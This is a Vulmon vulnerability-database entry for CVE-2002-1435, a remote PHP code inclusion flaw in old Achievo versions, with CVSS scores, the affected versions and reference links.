Published: 11/04/2003 Updated: 05/09/2008

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

class.atkdateattribute.js.php in Achievo 0.7.0 up to and including 0.9.1, except 0.8.2, allows remote malicious users to execute arbitrary PHP code when the 'allow_url_fopen' setting is enabled via a URL in the config_atkroot parameter that points to the code.

Vulnerable Product	Search on Vulmon	Subscribe to Product
achievo achievo 0.7.1
achievo achievo 0.8.0 rc1
achievo achievo 0.8.0
achievo achievo 0.8.1
achievo achievo 0.8.0 rc2
achievo achievo 0.7.2
achievo achievo 0.9.1
achievo achievo 0.7.3
achievo achievo 0.9.0
achievo achievo 0.7.0

source: wwwsecurityfocuscom/bid/5552/info Achievo includes a PHP script which is used to generate JavaScript (classatkdateattributejsphp) This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information Attackers may subvert the variable ($config_atkroot) wh ...

NVD-CWE-Other http://archives.neohapsis.com/archives/bugtraq/2002-08/0235.html http://www.iss.net/security_center/static/9947.php http://www.securityfocus.com/bid/5552 http://www.achievo.org/lists/2002/Aug/msg00092.html https://nvd.nist.gov https://www.exploit-db.com/exploits/21745/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2002-1435

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect